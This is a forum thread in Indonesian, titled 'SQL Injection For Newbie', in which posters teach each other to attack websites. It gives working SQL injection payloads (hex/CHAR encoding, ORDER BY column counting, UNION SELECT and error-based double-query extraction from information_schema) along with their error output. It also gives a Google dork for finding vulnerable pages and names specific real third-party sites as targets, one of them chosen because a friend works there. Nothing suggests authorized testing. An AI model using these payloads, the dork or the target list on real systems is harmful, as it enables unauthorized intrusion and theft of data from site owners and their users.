Home General Computer Multimedia Business Lounge
|
Tutor SQL Injection For Newbie (Share Di Mari)
|
|
12-29-2011, 11:32 PM
|
|||
|
|||
RE: SQL Injection For Newbie (Share Di Mari)
(12-29-2011 10:00 PM)eidelweiss Wrote: om bisa di jelasin nggak pada bagian ini Code: table_name= 0x757365725f6163636f756e74--ane bantu jawab ya.. disitu pake hex, mungkin karena tanda quote (') di escape menjadi \' jadi kita tidak bisa gunakan sebagai nama table kalau seandainya tidak di escape, maka kita bisa langsung gunakan Code: table_name = 'user_account'--selain dirubah ke bentuk hex, kita bisa juga gunakan fungsi CHAR() contoh Code: table_name=char(117,115,101,114,95,97,99,99,111,117,110,116)-- |
|||
Reputed by : eidelweiss(+1) |
|
12-29-2011, 11:57 PM
|
|||
|
|||
RE: SQL Injection For Newbie (Share Di Mari)
(12-29-2011 11:32 PM)ketek Wrote: ane bantu jawab ya.. makasih banyak om ketek udah bantu jawab,, ane lagi pusing ini buat ngasih jawaban dari om edelwies maklum newbie galau ![]() tapi nnti ane usahakan jawab om sekarang lagi
|
|||
|
12-30-2011, 01:51 AM
|
|||
|
|||
|
RE: SQL Injection For Newbie (Share Di Mari)
Code: www.canseburesort.co.idCode: www.canseburesort.co.id/?id_page=6&id_berita=15maklum pemula
|
|||
|
12-30-2011, 04:45 AM
|
|||
|
|||
RE: SQL Injection For Newbie (Share Di Mari)
(12-30-2011 01:51 AM)mendung Wrote: klo 15 itu id dari beritanya omz.. ![]() 1 = berita 1 2 = berita 2 dst..
|
|||
|
12-30-2011, 07:19 AM
|
|||
|
|||
RE: SQL Injection For Newbie (Share Di Mari)
(12-30-2011 01:51 AM)mendung Wrote: ane dapet target ini karena temen ane ada yang kerja disana ![]() sebenernya bisa juga pencarian informasi web pake google dork (kalo ngga salah) kalo emang pertanyaan dari ente Code: nyarinya gimana ? sampai ketemu ini web dan bukan yang lain ?Code: inurl:"id=" & intext:"Warning: mysql_fetch_assoc()15 = id_berita (itu artinya nomer halaman berita om, dari websitenya ) dan kebetulan ada vuln di sana
|
|||
|
01-01-2012, 10:43 PM
|
|||
|
|||
|
RE: SQL Injection For Newbie (Share Di Mari)
om ketek , eidelweiss , cangcimen , tabun
kalo misal yg keluar Quote:Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dhanoad/public_html/newscategories/index.php on line 346 contohnya di web : http://www.gabbr.com/thread.php?id=88 http://svitmoto.com/news.php?id=16 http://www.stmik-time.ac.id/ http://aritaglobal.co.id/products.php?idcat=1 itu digimanain omz ? kalo dikasih single mark (') atau perintah order by juga yg keluar sama aja omz. 1 lagi omz di web ini http://www.capsweb.org/content.php?id=57 kalo di kasih order by 17-- itu kan "Unknown column '17' in 'order clause'" nah berarti jadinya : http://www.capsweb.org/content.php?id=57 order by 16-- nah nanti nya pas perintah union all select itu angkanya gimana ? apakah 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 atau 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 atau gimana ? soalnya ane coba yg kya gitu ga keluar apa" om .. mohon penjelasannya
|
|||
|
01-02-2012, 02:20 AM
|
|||
|
|||
RE: SQL Injection For Newbie (Share Di Mari)
(01-01-2012 10:43 PM)CyberKaze Wrote:Quote:Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dhanoad/public_html/newscategories/index.php on line 346 cara ente udah bener gan, sebenernya website yang agan maksud ini bisa kita inject dengan double query kenapa demikan?... karena ketika ane coba dengan Code: id=57 and 1=1 ------->true mungkin ini bisa dibilang error based (tapi ane ngga yakin, mungkin momod yang bisa kasih tau)kenapa ane berfikir itu vuln terhadap double query, karena ane pernah dapet yang kaya gituan sekarang coba kita cermati baik2 query dibawah Code: id=57 and(select 1 FROM(select count(*),concat((select (select concat([color=#FF4500]database[/color]())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)sekarang coba kita ganti database jadi seperti berikut: Code: version()maka berturut-turut akan jadi seperti gambar dibawah ini ![]() Code: id=57 and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables GROUP BY x)a)![]() kita dapet pesan Code: Duplicate entry '~'17'~1' for key 'group_key'![]() sekarang kita pengen tau nama databasenya apa aja: Code: and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT [color=#FF4500]0[/color],1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)Code: Duplicate entry '~'information_schema'~1' for key 'group_key'demikian dari apa yang bisa ane bantu om,, ente bisa cari nama tabel dan nama kolom sendiri, mungkin ente bisa explore lagi dari contoh ane yang dia atas.. ![]() maaf kalo penjelasan ane ngawur atau ngaco,, (newbie)referensi Code: [url]http://hacksafe.blogspot.com/2010/10/quick-dirty-mysql-error-based-blind.html[/url] |
|||
Reputed by : CyberKaze(+1) |
|
01-03-2012, 03:50 PM
|
|||
|
|||
|
RE: SQL Injection For Newbie (Share Di Mari)
kalau pake hp gimana itu...pake opmin?..ko ga bisa bisa...
aku bingung masta.. |
|||
|
01-03-2012, 06:39 PM
|
|||
|
|||
|
RE: SQL Injection For Newbie (Share Di Mari)
ane pake hp teruz
|
|||
|
01-05-2012, 12:17 PM
|
|||
|
|||
| RE: SQL Injection For Newbie (Share Di Mari) | |||
|
« Next Oldest | Next Newest »
|
| Topic Tools | ||||||
| ||||||
| Users Browsing |
| 1 Guest(s) |






sekarang lagi


![[Image: zv4vmx.jpg]](http://oi40.tinypic.com/zv4vmx.jpg)
![[Image: 10h4lc6.jpg]](http://oi40.tinypic.com/10h4lc6.jpg)
![[Image: 2mfai6b.jpg]](http://oi39.tinypic.com/2mfai6b.jpg)
![[Image: 34t5ncz.jpg]](http://oi42.tinypic.com/34t5ncz.jpg)
![[Image: 10wo5ya.jpg]](http://oi42.tinypic.com/10wo5ya.jpg)
![[Image: fdxehi.jpg]](http://oi43.tinypic.com/fdxehi.jpg)
![[Image: 6h7yir.jpg]](http://oi44.tinypic.com/6h7yir.jpg)






